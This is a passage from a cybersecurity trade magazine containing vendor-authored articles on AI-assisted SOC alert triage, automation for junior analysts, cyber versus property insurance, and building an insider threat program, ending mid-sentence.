the value of the fetch and reporting capabilities. It essentially creates a command station for managing<br />

vulnerabilities, which is the ideal that everyone is trying to reach.<br />

If all of these features can be incorporated into a single pane of glass that the IT and SecOps user goes<br />

to everyday, it would be an incredibly powerful tool for reducing threats. This may sound basic, but it has<br />

been very difficult to do. As the industry moves closer, however, and a new emphasis is placed on<br />

vulnerability management, teams will soon get the relief they are searching for while fortifying their<br />

defenses against cyberattacks.<br />

As first published in BetaNews.<br />

About the Author<br />

Jim Souders is CEO of Adaptiva, a leading, global provider of endpoint<br />

management and security solutions for enterprise customers. A global<br />

business executive with more than 20 years’ experience, Jim excels at<br />

leading teams in creating differentiated software solutions, penetrating<br />

markets, achieving revenue goals, and P/L management. Prior to<br />

Adaptiva, Jim led high-growth organizations from start up to public offering<br />

and acquisition in a variety of advanced technologies, including IT<br />

infrastructure management, cross-platform mobile application<br />

development, WAN/LAN optimization, and wireless supply chain<br />

automation systems. For more information, please visit<br />

https://adaptiva.com/, and follow the company on LinkedIn, Facebook, and Twitter.<br />

31


The Intersection of Artificial Intelligence and <strong>Cyber</strong>security<br />

By John Harrison, Director, <strong>Cyber</strong>security Center of Excellence, Criterion Systems<br />

It is easy to be skeptical about Artificial Intelligence (AI). It has been promised (threatened?) for years,<br />

and while it is already showing up in our everyday lives – essentially through companies like Amazon<br />

and Facebook that use it to customize user experience and make doing things on their platforms more<br />

convenient – it has also been hijacked as a marketing buzz word, and frequently misused. However, as<br />

a cybersecurity professional, I believe it will help solve some of our greatest challenges, today and into<br />

the future.<br />

Given the confusion surrounding AI, I think it would be prudent to quickly define what it is. AI is a general<br />

practice and concept, including capabilities such as natural language processing, image recognition of<br />

objects, and pattern recognition through neural network models attempting to mimic cognitive functions<br />

of the brain. The term Machine Learning (ML) is frequently used interchangeably with AI, although there<br />

are distinct differences. ML algorithms use machines to learn about given data. A subset of ML includes<br />

deep learning, which has shown a lot of promise in the cybersecurity realm. Major differences of ML<br />

compared to AI include:<br />

• ML aims to increase accuracy described by confidence intervals whereas AI aims to achieve a<br />

successful goal and is less focused on accuracy.<br />

• ML learns from data obtained based on tasks and actions whereas AI uses computer programs<br />

to make decisions or apply logic, possibly using ML outputs as inputs to an AI program.<br />

32


• ML focuses on acquiring knowledge or skills by learning from many observations over time and<br />

optimizing its own model to improve accuracy whereas AI’s goal is to mimic a human response<br />

and decision-making process.<br />

Which brings me to the question: What are we cybersecurity professionals and organizations looking to<br />

get out of AI and ML? That question is predicated on what you are attempting to accomplish.<br />

Augmentation/Automation of <strong>Cyber</strong>security Processes<br />

To date, the most successful use of AI and ML in cybersecurity has been to help detect malware. By<br />

supplying machines with samples of good and bad pieces of executable code, they have been able to<br />

help identify what are normal and abnormal operations. This is how many of the next generation antivirus<br />

tools work: they are constantly learning and building unique graphs of how applications interact with<br />

systems, how users interact with applications, and how applications and users interact with data and<br />

other users and computers on the network.<br />

What we need now is for a system to learn to enable augmentation and/or automation of a variety<br />

cybersecurity processes to achieve a better outcome, such as saving time and money by using algorithms<br />

and models to perform a great deal of the initial trigate activities that analysts have to do manually today.<br />

Additionally, many low and informational alerts in Security Operations Centers (SOCs) currently go<br />

unattended due to a shortage of time and personnel. Using AI and ML to apply initial triage to see if any<br />

of the alerts are possibly related to one another represent low-hanging fruit and a great step forward.<br />

Consider this: Many attackers today are attempting to evade our defensive systems and if they can exploit<br />

networks and systems by staying under the radar by generating thousands of low-level alerts its less<br />

likely they will get caught and the organization might not even know they were compromised. As with the<br />

example of malware above, the first use that comes to mind for most of us is enhancing our detection<br />

and prevention abilities. But have you considered using AI and ML to augment response actions such as<br />

containment actions, ticket creation, and user engagement to triage and/or validate a suspicious action?<br />

Many of these activities are in the realm of possibilities today for the application of AI and ML, and offer<br />

true benefits, such as improving Service Level Agreements, reducing the time spent on each alert, and<br />

improving the Meant Time To Recovery (MTTR).<br />

Though AI and ML remains in the early stages of adoption and expansion, there are many business<br />

challenges and use cases that the cybersecurity community is eager to deploy in the very near future to<br />

address the challenges Security Operation Centers (SOCs) are facing today, including a massive digital<br />

transformation and the never-ending alerts coming in for triage.<br />

Implications of a Continuous Exponential Growth in Data<br />

According to the International Data Corporation, data will grow by 61% to 175 zettabytes (ZBs) by 2025,<br />

which is equivalent to the data stored on 250 billion DVDs, according to University of California –<br />

Berkeley. The majority of this data will reside in cloud and data center environments. Other interesting<br />

33


insights from the same reports includes the fact that 90ZBs will be created on Internet of Things (IoT)<br />

devices, nearly 30% of all data will be consumed in real-time, and almost half (49%) of data will be stored<br />

in public clouds – all by 2025. Furthermore, the increase in data, especially real-time data, is correlating<br />

to the number of devices that are connected to private and public networks, which does not show<br />

indications of slowing down anytime soon. Next-generation cyber warriors will be dealing with volumes<br />

of data never seen before occurring in real time making it difficult to spot, assess, and act on future cyber<br />

attackers. Attackers will likely attempt to disguise and blend into the noise using AI and ML techniques<br />

to mask their malicious intent. The challenge for cybersecurity professionals and organizations is how to<br />

harness automation and build next-generation SOCs using AI and ML, which will be crucial for keeping<br />

up with the volume and velocity of cyber-related data, created by more users and more machines.<br />

The Alerting Nightmare Many SOCs Face<br />

Millions of daily alerts: This is a normal day as a SOC manager, and it raises several challenges:<br />

• Eliminating false positives to focus effort on prioritizing “real” alerts based on severity and<br />

probability.<br />

• Reviewing all alerts may be impossible.<br />

• Many SOCs will avoid some alerts because they are considered low-level or have fired off too<br />

many false positives. Remember, however, 10-15 low-level alerts that, when combined and based<br />

on the sequence or the nature of those alerts, could equal a high alert translating into a full<br />

compromise.<br />

• It is common for many SOCs to fall into the alert fatigue trap and not consider how adversaries<br />

operate. Just as military operatives, they always attempt to fly below the radar. Therefore, they<br />

focus on exploiting weaknesses to which that they feel SOCs are less likely to be giving careful<br />

attention.<br />

What are some of the solutions to these challenges? Writing correlation/behavioral rules can help, but<br />

this has its own limitations and they can be easy to evade if not written correctly. Writing behavioral rules<br />

is also complex and requires unique skills – which are in great shortage within the cyber community right<br />

now. A better approach is to save profiles for users, workstations, servers, networking devices, etc., and<br />

use ML to generate anomalies and determine behavioral patterns in the form of classifications. This<br />

approach is better because it more easily scales and can solve two major problems: The cybersecurity<br />

talent shortage and attacks that attempt to evade detection systems by hiding in the noise as we<br />

previously explained above.<br />

Using AI and ML together, anomalies can be generated that are then passed through a series of AI<br />

models to determine their probability and severity as well as to determine if any specific example crosses<br />

a threshold which should trigger an event/alarm. For example, an anomaly is triggered off a user<br />

behavioral pattern that has drifted from its normal operation. It is then analyzed by machines to determine<br />

if that anomaly occurred before, at what frequency, and if it can be predicted with a reasonable level of<br />

probability that the event is actually abnormal. If so, it may be passed to an AI-bot that triggers an alert<br />

to the user text or an alternative email address to ask if the action was prompted by them or not. If not,<br />

then an alarm is triggered by the AI intrusion system and the incident response process begins. This is<br />

34


just one of many examples of how AI and ML can help with alert fatigue and scaling limited talented<br />

resources while also having the ability to respond in seconds versus minutes and hours.<br />

How Organizations Should Start Using AI and ML for <strong>Cyber</strong>security<br />

First, organizations should define what they want to teach a system to help augment and/or automate<br />

response actions. In my opinion, I think AI and ML is at a point where it can be of more help in augmenting<br />

than it can in automating. (The day where machines will be able to fully think like humans may come, but<br />

operationally, that is many years away.) Having worked in several SOCs and managed my own Managed<br />

Security Service Provider, I have seen analysts and incident responders performing repeated tasks day<br />

in and day out that could be augmented by AI. The AI-bot example provided above is one way this could<br />

work. In another example, Thomas Caldwell from Webroot provided a great demo of his AI bot using<br />

Amazon’s Alexa device at an RSA Conference session named the “Evolution of AI Bots for Real-time<br />

Adaptive Security.”<br />

Here’s one note of caution: Using AI/ML for response actions is complicated. It requires the right skills<br />

and data to be analyzed in order to create the feature sets that are viable candidates for AI and ML<br />

modeling and are specific for how your organization operates. If a vendor offers you a solution that allows<br />

you to run ML algorithms from your data and calls that AI or behavioral detection, turn and run as fast as<br />

you can! The great news is that today, a good portion of data created by machines and users are using<br />

standardized formatting and language, making it easier for the cyber community to share and build off of<br />

others’ AI and ML feature data sets. Keep in mind, however, that just as defenders are using AI and ML,<br />

adversaries are as well. To get started I recommend following some best practices that include, but are<br />

not limited to:<br />

1. Spend the time to create well-defined outcomes and measurable targets for challenges you<br />

need to solve in security. What tasks/problems do you want a machine to learn and what tolerance<br />

do you have for false positives?<br />

2. Consider if more simplified tools could achieve a more efficient and effective outcome than an<br />

AI and ML model. For example, running models to determine behaviors of where applications are<br />

executed from can help detect abnormal operations. However, it might be easier to standardize<br />

and baseline where all applications are allowed to run from and trigger an alert if one executes<br />

from a different file path outside of the baseline. Application whitelisting is an easier solution to<br />

this problem as well.<br />

3. Brainstorm and pair data scientists with cybersecurity expertise to create features derived from<br />

your existing cybersecurity data to solve a relevant problem/outcome. The data that is being<br />

generated on the network is not necessarily what gets fed into the model. For instance, financial<br />

traders using algorithms to hedge stock portfolios tend to use ratios as an input set of data that is<br />

computed based lower level data sets such as fluctuations of price, volume of trades, etc.<br />

4. Experiment with various combinations of features, algorithms, and classifiers to find the best fit<br />

model for the desired outcome and achieving the measurable target you had established<br />

beforehand. If the model doesn’t predict an event at the same rate or better than a human, what<br />

value does the model provide? Trial and error is the best approach and interestingly, machines<br />

35


can learn from these trial experiments as well to help automate the selection of features, though<br />

that is still a bit early in its maturity.<br />

I’m excited, just as many cybersecurity professionals are, at how far AI and ML has come and where the<br />

capability is heading. It’s a great way to augment operations today, allowing resources to be diverted to<br />

solving greater challenges and helping mature SOCs around the world. AI and ML will not likely solve all<br />

of our problems in the near future, but if it could help solve even one or two major challenges, I think<br />

many SOC managers and leaders would find that immensely valuable in the important mission of<br />

protecting critical assets from all types of malicious cyber actors.<br />

About the Author<br />

John Harrison is the Director of Criterion Systems’ <strong>Cyber</strong>security<br />

Center of Excellence. With more than 15 years of experience in the<br />

security industry, he helps design cybersecurity programs to protect<br />

government customers. He is a combat service-disabled veteran who<br />

served eight years in the US Marine Corps as an intelligence operator<br />

and foreign military combat trainer. Following his military career, he<br />

spent several years in the Intelligence Community. He has a bachelor’s<br />

degree in criminal law, an MBA from Georgetown, and is a certified<br />

ethical hacker and incident handler from EC-Council and SANS GIAC,<br />

respectively.<br />

36


From Guards to Detectives: Evolving the Junior Security<br />

Analyst Role<br />

By Mike Armistead, CEO and Co-Founder, Respond Software<br />

Across all industries, we’re coming to accept and, in some cases, look forward to augmenting human<br />

roles with the support of intelligent automation. There is a growing shift from fear of change, to welcoming<br />

it with open arms.<br />

Garry Kasparov, one of the greatest chess players of all time who expressed skepticism when a computer<br />

beat him, is a perfect example of how perceptions of Artificially Intelligence (A.I.) are changing. In a recent<br />

interview, he admitted he changed his view after witnessing some of the world’s greatest game players<br />

lose to machines, including when Google’s AlphaGo defeated the world’s best player of Go, a complex<br />

ancient strategy game.<br />

37


An interesting takeaway for these so-called “defeated” human champions? By playing the computer, they<br />

all learned new methods and strategies that were unexplored before. Today, Kasparov says, “A.I. will<br />

help us to release human creativity. Humans won’t be redundant or replaced, they’ll be promoted.”<br />

That is exactly what the cyber security industry needs to achieve for Junior Security Analysts by arming<br />

them with intelligent automation. In doing so, we can help to accelerate the career progression of a<br />

security analyst starting from their first day through to the day they retire.<br />

Attracting AND Retaining New Security Talent<br />

The security industry is laser-focused on closing the skills gap; however, we continue to allow emerging<br />

professionals to experience disillusionment in the earliest (arguably, most critical) stages of their careers.<br />

Not only is the industry struggling to attract new talent, many promising junior employees are leaving the<br />

field of cybersecurity entirely. They’re doing so out of frustration, stress, or boredom with the monotony<br />

of the tasks assigned to them.<br />

In a recent study by the Cyentia Institute, 45 percent of surveyed security analysts said the reality in the<br />

Security Operations Center (SOC) does not meet expectations. One in four expressed dissatisfaction<br />

with their current job.<br />

This is especially true of entry-level analysts, whose analysis duties typically consist primarily of<br />

monitoring raw alerts, looking for ways to enrich them with additional contextual information and—if they<br />

are lucky to be given additional responsibility—deciding which events to escalate. Despite knowing the<br />

vast majority of alerts are false positives, they worry they will miss that “needle in the haystack” event<br />

linked to a real attack and it will cost them their career.<br />

Reducing attrition and recruiting the best and the brightest into the cybersecurity field will require<br />

collaboration across organizations and the industry as a whole.<br />

Security Automation = Analyst Elevation<br />

Humans alone simply don’t have the capacity to keep pace with today’s volume of data and threats.<br />

Trying to keep pace can both discourage and exhaust budding security analysts early on in their<br />

cybersecurity careers.<br />

For any security analyst, detecting intrusions is rewarding and makes them feel like they’re making a real<br />

difference. With the continued emergence of security automation, Junior Security Analysts experience<br />

more success on a day-to-day basis. Intelligent automation has the potential to shift the way Junior<br />

Security Analysts work significantly by:<br />

• Refocusing from the mundane to the imaginative: Security analysts would rather act like<br />

detectives than mall cops, spending their time hunting threats and gathering intelligence than<br />

following routines or performing rote functions. Automated security workflow solutions, such as<br />

SOAR and SIEM) can take on many mundane aspects of the job, enabling human security<br />

38


analysts to focus on its more interesting, complex, and “advanced” aspects—spending more time<br />

on higher value tasks that are more varied and exciting.<br />

• Sifting through fewer false positives: Intelligent security automation tools such as the emerging<br />

Robotic Decision Automation (RDA) solutions can better categorize and decrease false positives.<br />

Not only does this reduce the level of frustration amongst security analysts but it provides them<br />

with more contextual information to determine what’s really going on in the environment.<br />

• Capturing the full security story: Security analysis software can give frontline analysts a fuller<br />

view of what’s going on across the whole IT environment. It enables them to see each alert—not<br />

as a discrete event—or a piece of data streaming across a console—but instead as part of the<br />

story that’s taking place. Armed with greater context, analysts can make better decisions, faster<br />

that put them on the right path to resolving threats before they spread.<br />

With the support of intelligent solutions, we can elevate frontline security analysts into more advanced<br />

roles—enabling them to focus on threat hunting and endeavors that need their invaluable and<br />

unparalleled human ingenuity.<br />

A Promise to Budding Security Pros<br />

We’ve attracted young professionals into the cybersecurity field by promising them the job of a seasoned<br />

detective, and yet, many of them end up serving as the equivalent of a security guard—relegated to<br />

watching hundreds of alerts scroll by to ensure they don’t miss something.<br />

With Ponemon Institute estimating the average organization deals with over 200,000 security events<br />

each day, we’re putting early career analysts in front of nation-states and criminal syndicates and setting<br />

them up to fail.<br />

Security analysts at all levels need more support to succeed and enjoy their work as this widespread job<br />

dissatisfaction has the potential to deepen the skills gap. Intelligent, automated security software can<br />

empower Junior Security Analysts to be more successful and enable the industry to deliver on the<br />

promise of a stimulating and rewarding career in cybersecurity.<br />

39


About the Author<br />

Mike Armistead is the co-founder and CEO at Respond<br />

Software. He is an industry veteran with three decades of<br />

leadership experience in the security, application development<br />

and consumer internet arenas. Mike co-founded Fortify<br />

Software in 2003 and acted as VP & general manager for both<br />

Fortify and ArcSight business groups after the companies were<br />

acquired by HP in 2011. Prior to Fortify, he held executive and<br />

key product positions at companies that include Pure Atria (IBM<br />

Rational) and Lycos. Over his career, Mike has led groups in all<br />

aspects of the organization, including marketing, development,<br />

operations and sales. His experience has spanned from<br />

managing large enterprises (+$350M revenues) to multiple<br />

start-ups in numerous industries.Mike Armistead can be<br />

reached online at mike@respond-software.com and at our<br />

company website http://www.respond-software.com<br />

40


Where Property Insurance Ends and <strong>Cyber</strong> Insurance Begins—<br />

the Industry’s Biggest Issue More People Should Be Talking<br />

About<br />

By Matt Prevost, Senior Vice President, <strong>Cyber</strong> Product Manager at Chubb<br />

<strong>Cyber</strong>-attacks are expected to cost companies more than $2 trillion in <strong>2019</strong>, according to Juniper<br />

Research. Consequently, many companies—especially the larger ones—have already realized that<br />

cyber threats top the list of corporate risks and have incorporated cyber provisions into their existing<br />

insurance policies.<br />

However, as recent media coverage—and high-profile lawsuits—have proven, the increasingly complex<br />

and ever-evolving nature of cyber threats has led to misunderstandings in the marketplace, which are<br />

particularly prevalent when it comes to the lines of distinction between the provisions of traditional<br />

property insurance policies versus those of cyber insurance policies. While this distinction may sound<br />

simple, it’s not, and the nuance could impact billions of dollars in losses in the event of a large cyberattack.<br />

Physical vs Digital <strong>Cyber</strong> Threats<br />

To better contextualize these situations, it is first important to understand that as cyber attacks have<br />

grown, evolved, and changed, and today’s cyber threats are blurring the lines between the strictly ‘digital’<br />

attacks and the ‘physical’ impacts of an event.<br />

41


As an illustration, consider the following scenario: the elevator control panel in a high-rise commercial<br />

building is hacked, causing the elevator to malfunction and fall 30 stories. While this is a cyber-attack that<br />

results in damage to physical property, several different insurance policies could respond to the<br />

consequences of the attack.<br />

For example, typical general liability policies would respond to claims for bodily injury made by individuals<br />

who were hurt as the result of the elevator collision, against potentially responsible parties. Similarly,<br />

typical property policies would respond to the direct physical damage and resulting business interruption<br />

loss because the cyber-attack caused the elevator to collide with other property, and elevator collision is<br />

normally a covered caused of loss. Conversely, if outcomes from the hack did not result in direct physical<br />

loss or damage or bodily injury, but rather rendered the elevator unusable, then the result would be limited<br />

to a business interruption (BI) loss. In this scenario, most property policies would not respond to the BI<br />

loss because there was no direct physical loss or damage. However, a cyber policy would generally<br />

respond to this type of digital disruption loss.<br />

Put simply, a variety of different insurance policies could respond to the consequences of a cyber event<br />

depending on the circumstances. As a result, now more than ever, it is important to work with an<br />

insurance carrier, along with an agent or broker, to find enterprise-wide insurance solutions that fit your<br />

business’ specific needs and entire risk profile.<br />

What to Look for In the <strong>Cyber</strong> Insurance Process<br />

As cyber events have changed over time, so too have the associated risks. While cyber-specific policies<br />

are key to protecting against cyber risks, a comprehensive analysis of the entire scope of a company’s<br />

risks is critical to preparing for all potential exposures.<br />

When exploring your options, executives should focus on two key characteristics—the first being a<br />

diligent underwriting process and an agent or broker willing to engage fully in the entirety of the insurance<br />

portfolio. This process should contemplate complex situations and focus on obtaining a portfolio of<br />

insurance solutions comprised of multiple insurance policies that seamlessly address your company’s<br />

exposures enterprise-wide. Secondly, this portfolio of solutions should include access to inclusive risk<br />

mitigation tools, such as integrated loss control services, continuous threat analysis, comprehensive<br />

claims management, and post-breach services.<br />

While most traditional cyber insurance policies offer robust standalone insurance protection, some<br />

insurers have created additional umbrella policies—that use the above characteristics to go beyond<br />

standard risk transfer by incorporating a holistic risk management solution into a single policy purchase,<br />

and thereby closing unanticipated gaps in the scope of your insurance protection. Although it is important<br />

for companies to find a robust standalone cyber policy, it is equally critical for executives to work with<br />

producers and insurers to find additional umbrella provisions that provide critical additional limits for large<br />

unforeseen events and contemplate the broad array of cyber exposures affecting companies.<br />

The Importance of Education & Communication<br />

Now more than ever, it is important to find an insurance policy that offers your business protection against<br />

the dynamic and ever evolving risks of cyber-attacks and resulting loss. In order to do so, it is important<br />

42


to have in-depth conversations with your insurance agent, broker, and/or risk manager about the<br />

protections and policies that will work best for your business.<br />

Every business and insurance policy is different, but by working with an experienced carrier to evaluate<br />

your company’s complete risk profile, you can better ensure your business will be prepared and protected<br />

in the event of a loss. As the number of cyber incidents continues to rise—The Chubb<strong>Cyber</strong> Index SM of<br />

proprietary claims data shows that cyber claims have increased 67% since 2016—this threat is more<br />

imminent than ever.<br />

About the Author<br />

Matt Prevost is <strong>Cyber</strong> Product Manager at Chubb. He can be reached at:<br />

matt.prevost@chubb.com. Our company website is www.chubb.com<br />

43


How to Build an Effective Insider Threat Program: Part I<br />

By Shareth Ben, Insider Threat SME at Securonix<br />

On the heels of insider threat awareness month, it’s clear that although we are more aware of the attacks<br />

and threats from within an organization, we still have a long way to go. This first article in a two-part series<br />

provides practical tips on what and who to consider when building a program to combat insider threats.<br />

It has been six years since the Snowden incident took place, sending a wakeup call to large enterprises<br />

that they needed to start looking internally for risks posed by employees and contractors. Two years later<br />

Galen Marsh, who was a financial advisor at a prominent Wall Street bank, damaged the bank’s<br />

reputation by stealing sensitive client data from corporate systems and uploading it to a personal server<br />

hosted at his home. While these high-profile cases caught the attention of security professionals, there<br />

are many insider-caused incidents happening every day that put organizations at financial and<br />

reputational risk.<br />

Guarding the perimeter of an organization’s network alone is not enough. The adoption of the cloud for<br />

infrastructure, middleware, and applications is growing at a phenomenal pace. The benefits of moving to<br />

the cloud are obvious, but along with that comes an increased need for security. The enterprise perimeter<br />

is becoming more porous as the applications that drive business rest outside the secure perimeter of the<br />

enterprise, requiring that the enterprise network be open to external networks while still being secure.<br />

44


There is no doubt that insider threat risks continue to matter, and organizations need to take detective<br />

and preventive measures before it’s too late.<br />

Multiple surveys indicate that insider threats are a key source of concern for enterprises. According to<br />

<strong>Cyber</strong>security Insiders’ 2018 Insider Threat Report, 90 percent of organizations feel vulnerable to insider<br />

threats – with 53 percent confirming insider attacks against their organization.<br />

According to the Verizon <strong>2019</strong> Data Breach Investigations Report, 34 percent of breaches involved<br />

internal actors, and 29 percent involved the use of stolen credentials.<br />

What do these numbers mean?<br />

The bottom line is that these numbers can have an impact on your business which can be benign or<br />

severe depending on the outcomes caused by the insider’s actions. The Verizon report cited above also<br />

notes that 25 percent of breaches were motivated by the gain of strategic advantage (espionage). For<br />

example, if a research scientist at a pharmaceutical company sells the formula for a new drug to the<br />

competition, that pharmaceutical company can incur millions in revenue loss due to low-cost competition.<br />

This type of corporate espionage has happened in the past. In less severe cases employees or<br />

contractors have attempted to take proprietary data, which resulted in termination of employment or a<br />

harsh warning.<br />

The key takeaway is for organizations to decide how much effort they are willing to invest in terms of<br />

cost, resources and time depending on their industry vertical, nature of the business and risk exposure.<br />

How to build an effective insider threat program.<br />

Most medium and large organizations have limited insider monitoring in place using data loss prevention<br />

(DLP) or privileged access management (PAM) system solutions. However, they still struggle to<br />

effectively mitigate insider threat risks. This is because, as much as it may sound cliché, security cannot<br />

be solved using technology alone. It is a combination of people, process, and the nature of your business.<br />

We say the nature of your business here because what you do as a company determines what matters<br />

to you the most, and therefore what you want to protect.<br />

The key is to find synergies between people, process, and technology which are suitable for your<br />

organization, based on various factors such as organization size, culture, and most importantly risk<br />

appetite.<br />

Risk appetite can be defined as how much risk exposure an organization is willing to tolerate when it<br />

comes to insider threats. Most insider threat programs fail because the organization’s risk appetite is not<br />

clearly defined at the beginning. This lack of clarity creates a lack of focus during operations, preventing<br />

the program from seeing success in the investments made across people, process, and technology.<br />

45


Where to begin?<br />

The first step is to assess your organization’s appetite for risk and what the organization values the most.<br />

For example, some organizations value their brand reputation the most while others worry more about<br />

theft of intellectual property.<br />

The next step is to build a strong understanding and consensus across the key business units such as<br />

HR, legal, compliance, and key business units. This is essential for an effective program outcome. In<br />

order to accomplish this consensus, organizations should form an Insider Threat Working Group (ITWG).<br />

The ITWG’s mission is to educate the business units on the importance of protecting the organization<br />

from such threats.<br />

Lastly, the ITWG forms a partnership with key stakeholders to define policies and procedures. Laying<br />

down this foundation will pave the way for the future of the program.<br />

What type of risks to mitigate?<br />

According to the Carnegie Mellon CERT model the three types of insider risks that are caused due to<br />

insider threats are: confidential data leakage, IT sabotage, and fraud.<br />

Most organizations who have embarked on the insider threat monitoring journey focus on data leakage<br />

prevention and IT sabotage related monitoring as they can cause the most harm. The former is more<br />

common than the latter, but both can create havoc for organizations if not managed properly.<br />

The three primary types of insider risks can be mitigated as follows:<br />

46


IT sabotage<br />

• Monitor high privilege access to critical databases, servers, and applications that affect the<br />

integrity of the systems.<br />

• Server monitoring should include Windows security events, Windows authentication events, Unix<br />

auditd logs, <strong>Cyber</strong>ark logs, and others.<br />

• Database monitoring should include Guardium logs or similar for database activity monitoring.<br />

• Application monitoring should include business applications and third-party applications.<br />

Confidential data leakage<br />

• Monitor for the exfiltration of data by employees and contractors that leads to confidentiality issues<br />

and intellectual property theft.<br />

• Monitor egress vectors such as email, removable media, print, web uploads, CD, and DVD.<br />

• Leverage technologies such as DLP tools to monitor email gateway logs, print logs, SharePoint<br />

logs, and others.<br />

Fraud<br />

• Monitor for fraudulent activities that result in financial loss to an organization.<br />

• Categories of fraud include online banking fraud, expenses fraud, AP fraud, AML fraud, trade<br />

surveillance, and more.<br />

• Monitor log sources such as OLTP transactions, ATM transactions, wire transactions, and others.<br />

What type of insiders should you monitor for?<br />

Insiders can be categorized into three main types:<br />

• Negligent Insider: An employee or contractor unknowingly or accidently compromises data due<br />

to bad security hygiene.<br />

• Complacent Insider: An employee or contractor intentionally ignores policies and procedures or<br />

bypasses them because they think it’s not needed.<br />

• Malicious Insider: An employee who intentionally compromises data and misuses privileges in<br />

order to cause damage to the organization.<br />

In all three cases the employee or contractor is putting the organization at risk, but the malicious insider<br />

can result in the largest risk because of their intentionally malicious actions. This type of insider is also<br />

harder to detect because they are highly motivated and will typically actively work to circumvent existing<br />

controls and take other precautions to remain undetected.<br />

Securonix’s observation in the field is that organizations deal with complacent and negligent insiders 90<br />

percent of the time. The disciplinary actions taken against these insiders vary from warnings to<br />

47


termination of employment. The outcomes for a malicious insider can involve more serious<br />

consequences. The FBI has been involved in extreme cases including nation state attacks to steal<br />

valuable data such as intellectual property that is core to a business’s competency in the market.<br />

Summary<br />

Insider threats can have a significant negative effect on businesses today, but their impact can be<br />

mitigated by a well-thought out insider threat program that includes people, processes, and technology.<br />

Part two of this series on insider threat will address the technologies required to combat insider threat,<br />

how to evaluate them, and where to begin.<br />

About the Author<br />

Shareth Ben, Insider Threat SME at Securonix.Shareth is an information security<br />

professional with over a decade of program management experience, serving<br />

the security needs of Fortune 500 clients. Currently he is focused on<br />

providing insider threat and cyber threat solutions by bringing synergies<br />

between people, process, and technology to mitigate risks to enterprises. He is<br />

passionate about improving the security posture of organizations by providing<br />

thought leadership and best practices based on lessons learned in the<br />

field. Shareth has a Master’s degree in Information Systems and a Bachelor's<br />

degree in Computer science.<br />

48


How to Build an Effective Insider Threat Program: Part II,<br />

Technology<br />

By Shareth Ben, Insider Threat SME at Securonix<br />

In the first part of this series we discussed how insider threats can be mitigated by a well-thought out<br />

insider threat program that includes people, processes, and technology. This article dives deeper into the<br />

technology part of that equation. We’ll discuss what to look for in technology tools to best combat insider<br />

threats, where to start once you have those tools, and how to put the people and processes together with<br />

technology in order to achieve the best outcome.<br />

What type of technology is required?<br />

The ideal technology platform for insider threat combines technical and non-technical indicators of insider<br />

risk in order to compute a risk score that can be used to prioritize alerts for escalation and triage.<br />

The following functionalities are critical factors to look for in an insider threat detection and management<br />

technology.<br />

49


Centralized Logs<br />

The tool should have the ability to ingest a variety of technical and non-technical indicators of use activity.<br />

This is typically done using connector and collectors of various types depending on the target system.<br />

Normalize, Aggregate, and Correlate<br />

The tool should have the ability to normalize, aggregate, and summarize the user activity in preparation<br />

for data analysis and machine learning.<br />

Insider Threat Specific Content<br />

The tool should come with the necessary out-of-the-box content to meet your basic insider threat<br />

monitoring needs. It should also provide the ability to create custom content for industry-specific use case<br />

requirements. The detection mechanism should consist of standard rule-based violation triggers and user<br />

behavior-based anomaly detection. It is this combination that proves to be most effective against insider<br />

threats.<br />

Threat Chains<br />

Once the nefarious behavior is detected, the tool should facilitate stitching or chaining individual events<br />

into one holistic threat. For example: a user who has been identified as a flight risk is identified as<br />

accessing and downloading an abnormal amount or type of data, followed by an attempt to exfiltrate that<br />

data.<br />

Risk Scoring<br />

Once the insider threat behavior has been detected using threat chains, these alerts need to be risk<br />

scored in order to prioritize the threats from the noise.<br />

Investigation Tools<br />

When it comes to insider threats, the situation is seldom black and white. The security analyst requires a<br />

tool that can provide the necessary context in order to be able to complete their investigation of the<br />

prioritized threats.<br />

50


Incident Response Workflows<br />

When a prioritized threat is deeded escalation worthy, the tool should facilitate the necessary escalation<br />

and triage workflow amongst the concerned parties.<br />

Where to Start<br />

While organizations can decide their own pace for onboarding data based on their insider threat<br />

monitoring goals, an iterative approach is highly recommended. We have seen several successful insider<br />

threat projects begin with a foundational layer and build incrementally over time to reach a better maturity<br />

state.<br />

The following table proposes the types of data that organizations should consider ingesting based on<br />

their maturity.<br />

Maturity Data Exfiltration Detection IT Sabotage<br />

Level 1<br />

(Foundational)<br />

Email activity<br />

USB activity<br />

Proxy activity<br />

Windows authentication logs and<br />

security events<br />

Unix authentication logs (if<br />

applicable)<br />

Single sign-on (SSO) logs<br />

Critical database activity logs<br />

Level 2<br />

(Intermediate)<br />

DLP monitoring<br />

Endpoint monitoring<br />

Content sharing logs (Box, Dropbox,<br />

etc.)<br />

SharePoint logs or similar<br />

Unix audit logs if applicable<br />

PAM logs<br />

Endpoint detection and response<br />

(EDR) logs<br />

AWS CloudTrail logs<br />

SSO logs<br />

51


Level 3<br />

(Advanced)<br />

File integrity monitoring<br />

Business specific applications<br />

Business specific application<br />

authentication and activity logs<br />

Data sources that are identified as<br />

business critical<br />

What does an ideal program look like in terms of people, process, and technology?<br />

Going back to the initial formula, let’s put the pieces together for an effective and practical insider threat<br />

program.<br />

People<br />

An insider threat working group (ITWG): Defines the risk appetite specific to the organization and drives<br />

consensus across key business units including HR, legal, compliance, IT security and lines of business.<br />

An insider threat program (ITP): A core team who are ideally a mix of technical and non-technical staff<br />

members. These staff members are well versed with the data they are dealing with, understand the<br />

organization’s culture, and know how to observe and differentiate between the different types of risks.<br />

Having someone with prior investigation experience is ideal but not a requirement.<br />

Training and enablement: The ITP team should obtain adequate training and enablement to use the<br />

technology for insider threat detection.<br />

Process<br />

Based on the risk appetite of the organization, and after identifying what they need to protect, the ITWG<br />

should create the policies and procedures required to manage the identified risks.<br />

Clearly articulate and establish the escalation and triage processes. There are different levels of<br />

escalation from level 1 to level n depending on the size of the organization and staff capabilities. The key<br />

is to have a standard and repeatable process which allows for scalability.<br />

Standard operating procedures are essential to make sure there is consistency in dealing with insider<br />

threats.<br />

52


Technology<br />

The technology should support both user behavior threat detection and rule-based threat detection.<br />

It should be able to stitch together multiple alerts using threat chains, and rank alerts according to risk.<br />

It should support automated playbooks and response in order to reduce manual work which would be<br />

otherwise required. This can only be attained when a program reaches a state of maturity. Organizations<br />

should not attempt to do this until the foundational components are in place.<br />

Beyond the ITP: Putting the right tools in place<br />

Having a strong ITP is an essential step towards combating insider threats; but a strong team requires a<br />

strong tool to use for insider threat detection. The section above outlines the capabilities that an effective<br />

insider threat prevention technology should possess, but finding a tool with all of these capabilities may<br />

not be as straightforward.<br />

Threat chains can be enabled both manually and in an automated manner. However, manual threat<br />

